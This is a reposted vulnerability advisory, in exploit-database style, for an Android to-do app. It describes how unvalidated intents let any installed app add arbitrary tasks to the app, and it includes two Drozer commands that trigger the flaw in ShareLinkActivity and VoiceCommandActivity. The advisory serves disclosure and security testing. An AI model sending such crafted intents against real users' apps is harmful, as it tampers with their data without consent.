Tasks_9.7.3_本地權限提升漏洞

# Tasks 9.7.3 本地權限提升漏洞
==EXP==

# Exploit Title: Tasks 9.7.3 - Insecure Permissions
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
# Vendor Homepage: https://tasks.org/
# Software Link: https://github.com/tasks/tasks
# Version: 9.7.3
# Tested on: Android 9
 
Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. 
A malicious application has several ways of how to achieve that:
 
1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list.
 
2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.
 
We used the Drozer application to emulate malicious app activity. Please find the commands below.
 
run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"
run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容